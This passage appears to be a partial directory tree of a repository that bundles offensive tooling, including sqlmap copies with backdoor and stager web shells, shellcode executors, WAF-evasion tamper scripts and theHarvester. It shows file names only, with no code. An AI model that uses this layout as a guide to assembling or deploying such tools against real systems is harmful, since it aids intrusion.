protocol.py │ │ │ │ ├── reactor.py │ │ │ │ ├── service.py │ │ │ │ ├── stream.py │ │ │ │ └── vinegar.py │ │ │ ├── experimental │ │ │ │ ├── __init__.py │ │ │ │ ├── retunnel.py │ │ │ │ └── splitbrain.py │ │ │ ├── lib │ │ │ │ ├── __init__.py │ │ │ │ ├── colls.py │ │ │ │ └── compat.py │ │ │ ├── utils │ │ │ │ ├── __init__.py │ │ │ │ ├── authenticators.py │ │ │ │ ├── classic.py │ │ │ │ ├── factory.py │ │ │ │ ├── helpers.py │ │ │ │ ├── registry.py │ │ │ │ ├── server.py │ │ │ │ ├── teleportation.py │ │ │ │ └── zerodeploy.py │ │ │ └── version.py │ │ ├── start.py │ │ ├── target.py │ │ ├── target.pyc │ │ ├── tests.py │ │ └── tmp │ │ │ ├── bashStatus.txt │ │ │ ├── initd │ │ │ ├── ls │ │ │ ├── lsa.c │ │ │ ├── p.c │ │ │ └── poison.c │ ├── steghidecracker.py │ ├── toolbox.py │ ├── vpn.py │ └── vulscan.py └── tools │ ├── .DS_Store │ ├── harvester │ ├── .gitignore │ ├── COPYING │ ├── LICENSES │ ├── README │ ├── changelog.txt │ ├── discovery │ │ ├── DNS │ │ │ ├── Base.py │ │ │ ├── Class.py │ │ │ ├── Lib.py │ │ │ ├── Opcode.py │ │ │ ├── Status.py │ │ │ ├── Type.py │ │ │ ├── __init__.py │ │ │ ├── lazy.py │ │ │ └── win32dns.py │ │ ├── IPy.py │ │ ├── __init__.py │ │ ├── asksearch.py │ │ ├── baidusearch.py │ │ ├── bingsearch.py │ │ ├── dnssearch-threads.py │ │ ├── dnssearch.py │ │ ├── dogpilesearch.py │ │ ├── exaleadsearch.py │ │ ├── googleCSE.py │ │ ├── googleplussearch.py │ │ ├── googlesearch.py │ │ ├── googlesets.py │ │ ├── jigsaw.py │ │ ├── linkedinsearch.py │ │ ├── pgpsearch.py │ │ ├── shodan │ │ │ ├── __init__.py │ │ │ ├── api.py │ │ │ └── wps.py │ │ ├── shodansearch.py │ │ ├── twittersearch.py │ │ ├── yahoosearch.py │ │ └── yandexsearch.py │ ├── myparser.py │ ├── tests │ │ └── myparser_test.py │ └── theHarvester.py │ ├── inject │ ├── .gitattributes │ ├── .gitignore │ ├── CONTRIBUTING.md │ ├── README.md │ ├── doc │ │ ├── AUTHORS │ │ ├── CHANGELOG.md │ │ ├── COPYING │ │ ├── FAQ.pdf │ │ ├── README.pdf │ │ ├── THANKS.md │ │ ├── THIRD-PARTY.md │ │ └── translations │ │ │ ├── README-gr-GR.md │ │ │ ├── README-hr-HR.md │ │ │ ├── README-id-ID.md │ │ │ ├── README-pt-BR.md │ │ │ └── README-zh-CN.md │ ├── extra │ │ ├── __init__.py │ │ ├── beep │ │ │ ├── __init__.py │ │ │ ├── beep.py │ │ │ └── beep.wav │ │ ├── cloak │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── cloak.py │ │ ├── dbgtool │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── dbgtool.py │ │ ├── icmpsh │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ ├── icmpsh-m.c │ │ │ ├── icmpsh-m.pl │ │ │ ├── icmpsh-s.c │ │ │ ├── icmpsh.exe_ │ │ │ └── icmpsh_m.py │ │ ├── mssqlsig │ │ │ └── update.py │ │ ├── runcmd │ │ │ ├── README.txt │ │ │ └── windows │ │ │ │ ├── README.txt │ │ │ │ ├── runcmd.sln │ │ │ │ └── runcmd │ │ │ │ ├── runcmd.cpp │ │ │ │ ├── runcmd.vcproj │ │ │ │ ├── stdafx.cpp │ │ │ │ └── stdafx.h │ │ ├── safe2bin │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── safe2bin.py │ │ ├── shellcodeexec │ │ │ ├── README.txt │ │ │ ├── linux │ │ │ │ ├── shellcodeexec.x32_ │ │ │ │ └── shellcodeexec.x64_ │ │ │ └── windows │ │ │ │ └── shellcodeexec.x32.exe_ │ │ ├── shutils │ │ │ ├── blanks.sh │ │ │ ├── duplicates.py │ │ │ ├── pep8.sh │ │ │ ├── pyflakes.sh │ │ │ ├── pylint.py │ │ │ └── regressiontest.py │ │ └── sqlharvest │ │ │ ├── __init__.py │ │ │ └── sqlharvest.py │ ├── lib │ │ ├── __init__.py │ │ ├── controller │ │ │ ├── __init__.py │ │ │ ├── action.py │ │ │ ├── checks.py │ │ │ ├── controller.py │ │ │ └── handler.py │ │ ├── core │ │ │ ├── __init__.py │ │ │ ├── agent.py │ │ │ ├── bigarray.py │ │ │ ├── common.py │ │ │ ├── convert.py │ │ │ ├── data.py │ │ │ ├── datatype.py │ │ │ ├── decorators.py │ │ │ ├── defaults.py │ │ │ ├── dicts.py │ │ │ ├── dump.py │ │ │ ├── enums.py │ │ │ ├── exception.py │ │ │ ├── log.py │ │ │ ├── option.py │ │ │ ├── optiondict.py │ │ │ ├── profiling.py │ │ │ ├── readlineng.py │ │ │ ├── replication.py │ │ │ ├── revision.py │ │ │ ├── session.py │ │ │ ├── settings.py │ │ │ ├── shell.py │ │ │ ├── subprocessng.py │ │ │ ├── target.py │ │ │ ├── testing.py │ │ │ ├── threads.py │ │ │ ├── unescaper.py │ │ │ ├── update.py │ │ │ ├── wordlist.py │ │ │ └── xmldump.py │ │ ├── parse │ │ │ ├── __init__.py │ │ │ ├── banner.py │ │ │ ├── cmdline.py │ │ │ ├── configfile.py │ │ │ ├── handler.py │ │ │ ├── headers.py │ │ │ ├── html.py │ │ │ ├── payloads.py │ │ │ └── sitemap.py │ │ ├── request │ │ │ ├── __init__.py │ │ │ ├── basic.py │ │ │ ├── basicauthhandler.py │ │ │ ├── comparison.py │ │ │ ├── connect.py │ │ │ ├── direct.py │ │ │ ├── dns.py │ │ │ ├── httpshandler.py │ │ │ ├── inject.py │ │ │ ├── methodrequest.py │ │ │ ├── pkihandler.py │ │ │ ├── rangehandler.py │ │ │ ├── redirecthandler.py │ │ │ └── templates.py │ │ ├── takeover │ │ │ ├── __init__.py │ │ │ ├── abstraction.py │ │ │ ├── icmpsh.py │ │ │ ├── metasploit.py │ │ │ ├── registry.py │ │ │ ├── udf.py │ │ │ ├── web.py │ │ │ └── xp_cmdshell.py │ │ ├── techniques │ │ │ ├── __init__.py │ │ │ ├── blind │ │ │ │ ├── __init__.py │ │ │ │ └── inference.py │ │ │ ├── brute │ │ │ │ ├── __init__.py │ │ │ │ └── use.py │ │ │ ├── dns │ │ │ │ ├── __init__.py │ │ │ │ ├── test.py │ │ │ │ └── use.py │ │ │ ├── error │ │ │ │ ├── __init__.py │ │ │ │ └── use.py │ │ │ └── union │ │ │ │ ├── __init__.py │ │ │ │ ├── test.py │ │ │ │ └── use.py │ │ └── utils │ │ │ ├── __init__.py │ │ │ ├── api.py │ │ │ ├── crawler.py │ │ │ ├── deps.py │ │ │ ├── getch.py │ │ │ ├── google.py │ │ │ ├── hash.py │ │ │ ├── hashdb.py │ │ │ ├── htmlentities.py │ │ │ ├── pivotdumptable.py │ │ │ ├── progress.py │ │ │ ├── purge.py │ │ │ ├── sqlalchemy.py │ │ │ ├── timeout.py │ │ │ ├── versioncheck.py │ │ │ └── xrange.py │ ├── plugins │ │ ├── __init__.py │ │ ├── dbms │ │ │ ├── __init__.py │ │ │ ├── access │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── db2 │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── firebird │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── hsqldb │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── maxdb │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── mssqlserver │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── mysql │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── oracle │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── postgresql │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── sqlite │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ └── sybase │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ └── generic │ │ │ ├── __init__.py │ │ │ ├── connector.py │ │ │ ├── custom.py │ │ │ ├── databases.py │ │ │ ├── entries.py │ │ │ ├── enumeration.py │ │ │ ├── filesystem.py │ │ │ ├── fingerprint.py │ │ │ ├── misc.py │ │ │ ├── search.py │ │ │ ├── syntax.py │ │ │ ├── takeover.py │ │ │ └── users.py │ ├── procs │ │ ├── README.txt │ │ ├── mssqlserver │ │ │ ├── activate_sp_oacreate.sql │ │ │ ├── configure_openrowset.sql │ │ │ ├── configure_xp_cmdshell.sql │ │ │ ├── create_new_xp_cmdshell.sql │ │ │ ├── disable_xp_cmdshell_2000.sql │ │ │ ├── dns_request.sql │ │ │ ├── enable_xp_cmdshell_2000.sql │ │ │ └── run_statement_as_user.sql │ │ ├── mysql │ │ │ ├── dns_request.sql │ │ │ └── write_file_limit.sql │ │ ├── oracle │ │ │ └── dns_request.sql │ │ └── postgresql │ │ │ └── dns_request.sql │ ├── shell │ │ ├── README.txt │ │ ├── backdoor.asp_ │ │ ├── backdoor.aspx_ │ │ ├── backdoor.jsp_ │ │ ├── backdoor.php_ │ │ ├── runcmd.exe_ │ │ ├── stager.asp_ │ │ ├── stager.aspx_ │ │ ├── stager.jsp_ │ │ └── stager.php_ │ ├── sqlmap.conf │ ├── sqlmap.py │ ├── sqlmapapi.py │ ├── tamper │ │ ├── __init__.py │ │ ├── apostrophemask.py │ │ ├── apostrophenullencode.py │ │ ├── appendnullbyte.py │ │ ├── base64encode.py │ │ ├── between.py │ │ ├── bluecoat.py │ │ ├── chardoubleencode.py │ │ ├── charencode.py │ │ ├── charunicodeencode.py │ │ ├── concat2concatws.py │ │ ├── equaltolike.py │ │ ├── greatest.py │ │ ├── halfversionedmorekeywords.py │ │ ├── ifnull2ifisnull.py │ │ ├── informationschemacomment.py │ │ ├── lowercase.py │ │ ├── modsecurityversioned.py │ │ ├── modsecurityzeroversioned.py │ │ ├── multiplespaces.py │ │ ├── nonrecursivereplacement.py │ │ ├── overlongutf8.py │ │ ├── percentage.py │ │ ├── randomcase.py │ │ ├── randomcomments.py │ │ ├── securesphere.py │ │ ├── sp_password.py │ │ ├── space2comment.py │ │ ├── space2dash.py │ │ ├── space2hash.py │ │ ├── space2morehash.py │ │ ├── space2mssqlblank.py │ │ ├── space2mssqlhash.py │ │ ├── space2mysqlblank.py │ │ ├── space2mysqldash.py │ │ ├── space2plus.py │ │ ├── space2randomblank.py │ │ ├── symboliclogical.py │ │ ├── unionalltounion.py │ │ ├── unmagicquotes.py │ │ ├── uppercase.py │ │ ├── varnish.py │ │ ├── versionedkeywords.py │ │ ├── versionedmorekeywords.py │ │ └── xforwardedfor.py │ ├── thirdparty │ │ ├── __init__.py │ │ ├── ansistrm │ │ │ ├── __init__.py │ │ │ └── ansistrm.py │ │ ├── beautifulsoup │ │ │ ├── __init__.py │ │ │ └── beautifulsoup.py │ │ ├── bottle │ │ │ ├── __init__.py │ │ │ └── bottle.py │ │ ├── chardet │ │ │ ├── __init__.py │ │ │ ├── big5freq.py │ │ │ ├── big5prober.py │ │ │ ├── chardetect.py │ │ │ ├── chardistribution.py │ │ │ ├── charsetgroupprober.py │ │ │ ├── charsetprober.py │ │ │ ├── codingstatemachine.py │ │ │ ├── compat.py │ │ │ ├── constants.py │ │ │ ├── cp949prober.py │ │ │ ├── escprober.py │ │ │ ├── escsm.py │ │ │ ├── eucjpprober.py │ │ │ ├── euckrfreq.py │ │ │ ├── euckrprober.py │ │ │ ├── euctwfreq.py │ │ │ ├── euctwprober.py │ │ │ ├── gb2312freq.py │ │ │ ├── gb2312prober.py │ │ │ ├── hebrewprober.py │ │ │ ├── jisfreq.py │ │ │ ├── jpcntx.py │ │ │ ├── langbulgarianmodel.py │ │ │ ├── langcyrillicmodel.py │ │ │ ├── langgreekmodel.py │ │ │ ├── langhebrewmodel.py │ │ │ ├── langhungarianmodel.py │ │ │ ├── langthaimodel.py │ │ │ ├── latin1prober.py │ │ │ ├── mbcharsetprober.py │ │ │ ├── mbcsgroupprober.py │ │ │ ├── mbcssm.py │ │ │ ├── sbcharsetprober.py │ │ │ ├── sbcsgroupprober.py │ │ │ ├── sjisprober.py │ │ │ ├── universaldetector.py │ │ │ └── utf8prober.py │ │ ├── clientform │ │ │ ├── __init__.py │ │ │ └── clientform.py │ │ ├── colorama │ │ │ ├── __init__.py │ │ │ ├── ansi.py │ │ │ ├── ansitowin32.py │ │ │ ├── initialise.py │ │ │ ├── win32.py │ │ │ └── winterm.py │ │ ├── fcrypt │ │ │ ├── __init__.py │ │ │ └── fcrypt.py │ │ ├── gprof2dot │ │ │ ├── __init__.py │ │ │ └── gprof2dot.py │ │ ├── keepalive │ │ │ ├── __init__.py │ │ │ └── keepalive.py │ │ ├── magic │ │ │ ├── __init__.py │ │ │ └── magic.py │ │ ├── multipart │ │ │ ├── __init__.py │ │ │ └── multipartpost.py │ │ ├── odict │ │ │ ├── __init__.py │ │ │ └── odict.py │ │ ├── oset │ │ │ ├── LICENSE.txt │ │ │ ├── __init__.py │ │ │ ├── _abc.py │ │ │ └── pyoset.py │ │ ├── pagerank │ │ │ ├── __init__.py │ │ │ └── pagerank.py │ │ ├── prettyprint │ │ │ ├── __init__.py │ │ │ └── prettyprint.py │ │ ├── pydes │ │ │ ├── __init__.py │ │ │ └── pyDes.py │ │ ├── socks │ │ │ ├── LICENSE │ │ │ ├── __init__.py │ │ │ └── socks.py │ │ ├── termcolor │ │ │ ├── __init__.py │ │ │ └── termcolor.py │ │ └── xdot │ │ │ ├── __init__.py │ │ │ └── xdot.py │ ├── txt │ │ ├── common-columns.txt │ │ ├── common-outputs.txt │ │ ├── common-tables.txt │ │ ├── keywords.txt │ │ ├── smalldict.txt │ │ ├── user-agents.txt │ │ └── wordlist.zip │ ├── udf │ │ ├── README.txt │ │ ├── mysql │ │ │ ├── linux │ │ │ │ ├── 32 │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ │ └── 64 │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ └── windows │ │ │ │ ├── 32 │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ │ │ └── 64 │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ └── postgresql │ │ │ ├── linux │ │ │ ├── 32 │ │ │ │ ├── 8.2 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.3 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.4 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.0 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.1 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.2 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.3 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ └── 9.4 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ └── 64 │ │ │ │ ├── 8.2 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.3 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.4 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.0 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.1 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.2 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.3 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ └── 9.4 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ └── windows │ │ │ └── 32 │ │ │ ├── 8.2 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ ├── 8.3 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ ├── 8.4 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ └── 9.0 │ │ │ └── lib_postgresqludf_sys.dll_ │ ├── waf │ │ ├── 360.py │ │ ├── __init__.py │ │ ├── airlock.py │ │ ├── anquanbao.py │ │ ├── baidu.py │ │ ├── barracuda.py │ │ ├── bigip.py │ │ ├── binarysec.py │ │ ├── blockdos.py │ │ ├── ciscoacexml.py │ │ ├── cloudflare.py │ │ ├── datapower.py │ │ ├── denyall.py │ │ ├── dotdefender.py │ │ ├── edgecast.py │ │ ├── expressionengine.py │ │ ├── fortiweb.py │ │ ├── hyperguard.py │ │ ├── incapsula.py │ │ ├── isaserver.py │ │ ├── jiasule.py │ │ ├── knownsec.py │ │ ├── kona.py │ │ ├── modsecurity.py │ │ ├── netcontinuum.py │ │ ├── netscaler.py │ │ ├── paloalto.py │ │ ├── profense.py │ │ ├── proventia.py │ │ ├── radware.py │ │ ├── requestvalidationmode.py │ │ ├── safedog.py │ │ ├── secureiis.py │ │ ├── senginx.py │ │ ├── sucuri.py │ │ ├── teros.py │ │ ├── trafficshield.py │ │ ├── urlscan.py │ │ ├── uspses.py │ │ ├── varnish.py │ │ ├── webappsecure.py │ │ └── webknight.py │ └── xml │ │ ├── banner │ │ ├── cookie.xml │ │ ├── generic.xml │ │ ├── mssql.xml │ │ ├── mysql.xml │ │ ├── oracle.xml │ │ ├── postgresql.xml │ │ ├── server.xml │ │ ├── servlet.xml │ │ ├── sharepoint.xml │ │ ├── x-aspnet-version.xml │ │ └── x-powered-by.xml │ │ ├── boundaries.xml │ │ ├── errors.xml │ │ ├── livetests.xml │ │ ├── payloads │ │ ├── 01_boolean_blind.xml │ │ ├── 02_error_based.xml │ │ ├── 03_inline_query.xml │ │ ├── 04_stacked_queries.xml │ │ ├── 05_time_blind.xml │ │ └── 06_union_query.xml │ │ ├── queries.xml │ │ └── sqlmap.xsd │ ├── sqli │ ├── .gitattributes │ ├── .gitignore │ ├── CONTRIBUTING.md │ ├── README.md │ ├── doc │ │ ├── AUTHORS │ │ ├── CHANGELOG.md │ │ ├── COPYING │ │ ├── FAQ.pdf │ │ ├── README.pdf │ │ ├── THANKS.md │ │ ├── THIRD-PARTY.md │ │ └── translations │ │ │ ├── README-gr-GR.md │ │ │ ├── README-hr-HR.md │ │ │ ├── README-id-ID.md │ │ │ ├── README-pt-BR.md │ │ │ └── README-zh-CN.md │ ├── extra │ │ ├── __init__.py │ │ ├── beep │ │ │ ├── __init__.py │ │ │ ├── beep.py │ │ │ └── beep.wav │ │ ├── cloak │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── cloak.py │ │ ├── dbgtool │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── dbgtool.py │ │ ├── icmpsh │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ ├── icmpsh-m.c │ │ │ ├── icmpsh-m.pl │ │ │ ├── icmpsh-s.c │ │ │ ├── icmpsh.exe_ │ │ │ └── icmpsh_m.py │ │ ├── mssqlsig │ │ │ └── update.py │ │ ├── runcmd │ │ │ ├── README.txt │ │ │ └── windows │ │ │ │ ├── README.txt │ │ │ │ ├── runcmd.sln │ │ │ │ └── runcmd │ │ │ │ ├── runcmd.cpp │ │ │ │ ├── runcmd.vcproj │ │ │ │ ├── stdafx.cpp │ │ │ │ └── stdafx.h │ │ ├── safe2bin │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── safe2bin.py │ │ ├── shellcodeexec │ │ │ ├── README.txt │ │ │ ├── linux │ │ │ │ ├── shellcodeexec.x32_ │ │ │ │ └── shellcodeexec.x64_ │ │ │ └── windows │ │ │ │ └── shellcodeexec.x32.exe_ │ │ ├── shutils │ │ │ ├── blanks.sh │ │ │ ├── duplicates.py │ │ │ ├── pep8.sh │ │ │ ├── pyflakes.sh │ │ │ ├── pylint.py │ │ │ └── regressiontest.py │ │ └── sqlharvest │ │ │ ├── __init__.py │ │ │ └── sqlharvest.py │ ├── plugins │ │ ├── __init__.py │ │ ├── dbms │ │ │ ├── __init__.py │ │ │ ├── access │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── db2 │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── firebird │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── hsqldb │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── maxdb │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── mssqlserver │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── mysql │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── oracle │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── postgresql │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── sqlite │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ └── sybase │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ └── generic │ │ │ ├── __init__.py │ │ │ ├── connector.py │ │ │ ├── custom.py │ │ │ ├── databases.py │ │ │ ├── entries.py │ │ │ ├── enumeration.py │ │ │ ├── filesystem.py │ │ │ ├── fingerprint.py │ │ │ ├── misc.py │ │ │ ├── search.py │ │ │ ├── syntax.py │ │ │ ├── takeover.py │ │ │ └── users.py │ ├── procs │ │ ├── README.txt │ │ ├── mssqlserver │ │ │ ├── activate_sp_oacreate.sql │ │ │ ├── configure_openrowset.sql │ │ │ ├── configure_xp_cmdshell.sql │ │ │ ├── create_new_xp_cmdshell.sql │ │ │ ├── disable_xp_cmdshell_2000.sql │ │ │ ├── dns_request.sql │ │ │ ├── enable_xp_cmdshell_2000.sql │ │ │ └── run_statement_as_user.sql │ │ ├── mysql │ │ │ ├── dns_request.sql │ │ │ └── write_file_limit.sql │ │ ├── oracle │ │ │ └── dns_request.sql │ │ └── postgresql │ │ │ └── dns_request.sql │ ├── shell │ │ ├── README.txt │ │ ├── backdoor.asp_ │ │ ├── backdoor.aspx_ │ │ ├── backdoor.jsp_ │ │ ├── backdoor.php_ │ │ ├── runcmd.exe_ │ │ ├── stager.asp_ │ │ ├── stager.aspx_ │ │ ├── stager.jsp_ │ │ └── stager.php_ │ ├── sqlmap.conf │ ├── sqlmap.py │ ├── sqlmapapi.py │ ├── tamper │ │ ├── __init__.py │ │ ├── apostrophemask.py │ │ ├── apostrophenullencode.py │ │ ├── appendnullbyte.py │ │ ├── base64encode.py │ │ ├── between.py │ │ ├── bluecoat.py │ │ ├── chardoubleencode.py │ │ ├── charencode.py │ │ ├── charunicodeencode.py │ │ ├── concat2concatws.py │ │ ├── equaltolike.py │ │ ├── greatest.py │ │ ├── halfversionedmorekeywords.py │ │ ├── ifnull2ifisnull.py │ │ ├── informationschemacomment.py │ │ ├── lowercase.py │ │ ├── modsecurityversioned.py │ │ ├── modsecurityzeroversioned.py │ │ ├── multiplespaces.py │ │ ├── nonrecursivereplacement.py │ │ ├── overlongutf8.py │ │ ├── percentage.py │ │ ├── randomcase.py │ │ ├── randomcomments.py │ │ ├── securesphere.py │ │ ├── sp_password.py │ │ ├── space2comment.py │ │ ├── space2dash.py │ │ ├── space2hash.py │ │ ├── space2morehash.py │ │ ├── space2mssqlblank.py │ │ ├── space2mssqlhash.py │ │ ├── space2mysqlblank.py │ │ ├── space2mysqldash.py │ │ ├── space2plus.py │ │ ├── space2randomblank.py │ │ ├── symboliclogical.py │ │ ├── unionalltounion.py │ │ ├── unmagicquotes.py │ │ ├── uppercase.py │ │ ├── varnish.py │ │ ├── versionedkeywords.py │ │ ├── versionedmorekeywords.py │ │ └── xforwardedfor.py │ ├── thirdparty │ │ ├── ansistrm │ │ │ └── ansistrm.py │ │ ├── beautifulsoup │ │ │ ├── __init__.py │ │ │ └── beautifulsoup.py │ │ ├── bottle │ │ │ ├── __init__.py │ │ │ └── bottle.py │ │ ├── chardet │ │ │ ├── __init__.py │ │ │ ├── big5freq.py │ │ │ ├── big5prober.py │ │ │ ├── chardistribution.py │ │ │ ├── charsetgroupprober.py │ │ │ ├── charsetprober.py │ │ │ ├── codingstatemachine.py │ │ │ ├── constants.py │ │ │ ├── escprober.py │ │ │ ├── escsm.py │ │ │ ├── eucjpprober.py │ │ │ ├── euckrfreq.py │ │ │ ├── euckrprober.py │ │ │ ├── euctwfreq.py │ │ │ ├── euctwprober.py │ │ │ ├── gb2312freq.py │ │ │ ├── gb2312prober.py │ │ │ ├── hebrewprober.py │ │ │ ├── jisfreq.py │ │ │ ├── jpcntx.py │ │ │ ├── langbulgarianmodel.py │ │ │ ├── langcyrillicmodel.py │ │ │ ├── langgreekmodel.py │ │ │ ├── langhebrewmodel.py │ │ │ ├── langhungarianmodel.py │ │ │ ├── langthaimodel.py │ │ │ ├── latin1prober.py │ │ │ ├── mbcharsetprober.py │ │ │ ├── mbcsgroupprober.py │ │ │ ├── mbcssm.py │ │ │ ├── sbcharsetprober.py │ │ │ ├── sbcsgroupprober.py │ │ │ ├── sjisprober.py │ │ │ ├── test.py │ │ │ ├── universaldetector.py │ │ │ └── utf8prober.py │ │ ├── clientform │ │ │ ├── __init__.py │ │ │ └── clientform.py │ │ ├── colorama │ │ │ ├── ansi.py │ │ │ ├── ansitowin32.py │ │ │ ├── initialise.py │ │ │ ├── win32.py │ │ │ └── winterm.py │ │ ├── fcrypt │ │ │ ├── __init__.py │ │ │ └── fcrypt.py │ │ ├── gprof2dot │ │ │ ├── __init__.py │ │ │ └── gprof2dot.py │ │ ├── keepalive │ │ │ ├── __init__.py │ │ │ └── keepalive.py │ │ ├── magic │ │ │ └── magic.py │ │ ├── multipart │ │ │ └── multipartpost.py │ │ ├── odict │ │ │ ├── __init__.py │ │ │ └── odict.py │ │ ├── oset │ │ │ ├── LICENSE.txt │ │ │ ├── __init__.py │ │ │ ├── _abc.py │ │ │ └── pyoset.py │ │ ├── pagerank │ │ │ ├── __init__.py │ │ │ └── pagerank.py │ │ ├── 